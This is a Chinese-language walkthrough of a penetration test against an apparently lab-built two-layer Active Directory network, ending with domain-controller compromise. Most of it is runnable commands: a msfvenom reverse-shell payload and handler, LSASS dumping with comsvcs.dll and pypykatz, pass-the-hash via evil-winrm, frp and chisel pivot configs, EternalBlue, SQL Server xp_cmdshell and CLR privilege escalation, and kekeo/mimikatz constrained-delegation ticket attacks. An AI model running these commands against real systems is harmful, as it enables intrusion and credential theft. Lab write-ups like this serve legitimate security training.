记一次二层内网域渗透实战

本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。

网络拓扑如下:

1637397959_6198b5c7a7d261e678ca1.pngsmall

web服务器

先来波端口扫描:

1637393448_6198a428a89ec56474ce0.pngsmall

这里介绍个有意思的小工具,https://github.com/mubix/IOXIDResolver

1637394297_6198a779272ebcb16f86c.pngsmall

直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完weblogic后我们在改回192段。

1637394487_6198a837c55015c95d66a.pngsmall看到了weblogic的版本,查找下exp,顺手先来一波smb信息收集。

smb信息收集

smbmap -H 10.10.20.12

smbclient -N -L //10.10.20.12

enum4linux -a 10.10.20.12

1637394783_6198a95f3df5f670358d9.pngsmall

rpcclient -U ” 10.10.20.12

smbclient -U ” -L \\10.10.20.12

1637394819_6198a98376ff2eeeb2974.pngsmall

weblogic漏洞利用

知道了weblogic的具体版本,可以直接去查询漏洞,也可以用工具自动扫描下;

1637396099_6198ae8342293ffd90dec.pngsmall这里直接用CVE的漏洞来打一波;

1637396575_6198b05f2d5ec4b3e8757.pngsmall

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4  LPORT=1234 -f psh-cmd > exploit.ps1

1637396206_6198aeee9d55e31de24b0.pngsmall

# use exploit/multi/handler

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost 10.10.20.4

# set lport 1234

# exploit

1637396284_6198af3c430f9f4457f88.pngsmall1637396389_6198afa5abc1200bb6b56.pngsmall1637396433_6198afd13c2d0a8c90c2c.pngsmall迁移下进程,开始抓密码;

1637396774_6198b126d9f76addd730a.pngsmall爆破一波,原来是个弱口令;

1637396833_6198b16176e1e4a95f3a0.pngsmall

接下来换成CS更方便;

./teamserver 192.168.223.138  123456

1637396891_6198b19b214b70b46a944.pngsmall

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar

1637396927_6198b1bf133e18c9db818.pngsmall信息收集一波;

1637397019_6198b21b7121ef1c4eae1.pngsmall

weblogic数据解密

在介绍下用注册表抓取hash的方法;

1637465693_6199be5d3740fe3adcb0b.pngsmall抓取成功后拖回本地;

1637465763_6199bea32e4bb3a7fbff1.pngsmall在本地解密;

1637476997_6199ea857317437b62b1d.pngsmall

这里有了hash之后,尝试下不用msf和cs来渗透;

evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165

1637397250_6198b3021e8faff30b7fe.pngsmall

get-process -name lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\temp\lsass.dmp full

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full

ls C:\windows\temp\lsass.dmp

download C:\windows\temp\lsass.dmp

1637397291_6198b32b48f904879d9f6.pngsmall

lsass.dmp重命名为weblogic.dmp

pypykatz lsa minidump weblogic.dmp -o weblogic.txt

1637397326_6198b34e4d98c50a39ee7.pngsmall

并没有发现预想中存在的密码,所以下面换个其他的方法;

1637397386_6198b38ae52dbc9925357.pngsmall1637397427_6198b3b3abf25c9743e11.pngsmall1637397454_6198b3cec3aafe46a536a.pngsmall解密工具可以解密了;

1637397529_6198b4192949cd4ae16c6.pngsmall至此,web服务器算是搞定了,下面开始个人主机的渗透。

个人主机

永恒之蓝利用

进入内网,个人主机已经无法直接出网了,需要搭建代理。

frp代理

服务端

[common]
bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5]
type = tcp
remote_port =7777
plugin = socks5

客户端

[common]
server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

proxychains nmap -v -Pn -T3 -sV -n -sT –open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 10.10.20.7

1637398239_6198b6df518e1ef751e1f.pngsmall这里还可以尝试下用chisel;

./chisel server -p 8000 –reverse

./chisel client 192.168.223.138:8000 R:8100:socks

1637398582_6198b83667eafbff27a57.pngsmall1637398606_6198b84eb250188f75e13.pngsmall在kali里设置好代理配置;

1637398675_6198b89387b432ee5396d.pngsmall

proxychains nmap –script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

1637398763_6198b8eb96e82aae03ea4.pngsmall很明显了,永恒之蓝;这里还是用frp代理,通过msf来方便点。

msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

1637398918_6198b9869bbf73db767de.pngsmall成功拿下个人主机,照例先抓下密码;

1637398979_6198b9c3cc7268eb92292.pngsmall

这里在介绍另一种抓取密码的思路,在目标机抓取后拿回本地来解密分析,在某些场合下会有奇效;

1637464336_6199b91092aed161dcd66.pngsmall取回本地,minidump方式解开

1637464374_6199b936d7d33943e5478.pngsmall查看结果;

1637464425_6199b969d31726bfe8d11.pngsmall为了后续方便,我们可以用CobaltStrike来继续,虽然msf和CS会话可以互通,但我还是习惯直接种马后使用。这里web服务器已经提前在CS上反弹好了,精华在于CS的中转功能。

因为此 Win7 不出网,随后只能通过 CobaltStrike 设置中转:

先创建中转监听器:1637399269_6198bae5afe2462ff0481.pngsmall1637399290_6198bafa8b6557edce343.pngsmall

生成木马:1637399310_6198bb0e575dbc08e76f5.pngsmall利用msf上传并运行木马后机器上线;

1637399429_6198bb8531e1d07834d15.pngsmall信息收集一波;1637399508_6198bbd495061bf793a9e.pngsmall1637399546_6198bbfa80066cf97ca99.pngsmall可以看到个人主机后面还有2台机器,分别是域控服务器和数据库服务器。在进行下一步渗透之前,先需要把二级代理搭建好。

二级代理搭建

先看看frp如何搭建二级代理;

kali上配置服务端;1637399823_6198bd0f892d550cbe707.pngsmallweb服务器上配置;(一个服务端,一个客户端)

1637399873_6198bd4177308cbca74b8.pngsmall个人主机上配置客户端;1637399937_6198bd815ff1c371d3a6c.pngsmall扫描测试下;1637399976_6198bda8f41682e3b5e21.pngsmall在用chisel搭建一个2级代理;

kali上配置服务端;1637400088_6198be1895aa8c667c192.pngsmallweb服务器上配置客户端和服务端;1637400133_6198be45c3936d7783e3a.pngsmall个人主机上配置客户端;1637400235_6198beabc42aa59212bb2.pngsmall扫描测试下;

proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv1637400280_6198bed8c15a94d555cf4.pngsmall

数据库服务器

这里先借助bloodhound来分析下域环境,以确定下一步的渗透思路,具体的安装及使用这里就不赘述了,我之前的文章有过详细介绍。

到达域管理员的最短路径;

1637473548_6199dd0c7ec4bcdf7af74.pngsmall用户:redteam.red/sqlserver 允许委托OWA的cifs服务(DC控制器)

1637473649_6199dd719780548d1dd47.pngsmall至此有了后续基本的渗透思路,就是通过委派攻击拿下域控,下面开始逐步实施;

根据之前端口扫描的结果,做下信息收集;

1637466257_6199c091047943dc1b90e.pngsmall1637466275_6199c0a304690d21b02af.pngsmall结合我们已经取得的个人主机控制权,首先当前进程是没有域管的,所以暂且放弃令牌窃取:

1637467093_6199c3d5864db66cee66e.pngsmall这里用到了约束委派攻击的知识,简单来说,在Windows系统中,普通用户的属性中没有委派(Delegation)这个选项卡,只有服务账号、主机账号才有。服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。例如MS SQL Server在安装时,会在域内自动注册服务账号SqlServiceAccount,这类账号不能用于交互式登录。(更具体知识要自己补一下)

由于我们已经拿到了一个域用户的账户密码,尝试查找约束委派的用户:

AdFind.exe -h 10.10.10.8 -u saul -up [email protected]#45 -b “DC=redteam,DC=red” -f “(&(samAccountType=805306368)(msds-allowedtodelegateto=*))” cn distinguishedName msds-allowedtodelegateto

1637468387_6199c8e3ef5804b8bd597.pngsmall

sqlserver 的用户是被设置了约束委派,但还需要密码;之前知道1433是开放的,爆破一波试试;

1637468663_6199c9f7138e0616209e6.pngsmall这样就可以执行xp_cmdshell 命令了;

1637468752_6199ca50e600bbd839ae5.pngsmall发现权限很小只是一个普通服务权限,下面开始提权;

使用 SharpSQLTools 开启目标 clr:(要用Proxifier挂上代理,就不截图了)

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

1637468864_6199cac0d79b494d625c3.pngsmall

然后启用并调用命令:

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

1637468889_6199cad93a866ad47be3f.pngsmall1637468903_6199cae78e510e0c503f8.pngsmall提取成功。

下面用msf来进行文件上传;

1637468968_6199cb283d24861d13d16.pngsmall1637468984_6199cb38472792ed27a4d.pngsmall上传一个CS的木马;

1637469020_6199cb5c0d2a2d6f26def.pngsmall

然后在用高权限来运行cs木马;

1637469043_6199cb7319cb5afc280da.pngsmall成功上线;

1637469078_6199cb96a46ea1bf74b38.pngsmall抓取下密码;

1637469235_6199cc336e29148268eb2.pngsmall至此,数据库服务器渗透结束,下面开始对域控的渗透。

域控

经过前面的分析,这里就是纯粹的利用约束委派拿下域控。

1、利用 kekeo 请求该用户的 TGT:[email protected][email protected]

kekeo.exe “tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi”

2、然后使用这张 TGT ([email protected][email protected]) 获取域机器的 ST:[email protected]@[email protected]

kekeo.exe “tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red”

3、使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt:

mimikatz kerberos::ptt [email protected]@[email protected]1637470680_6199d1d89b836b0557947.pngsmall成功拿到域控权限;1637470551_6199d157ef5639a8b5eed.pngsmall

© 版权声明
THE END
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片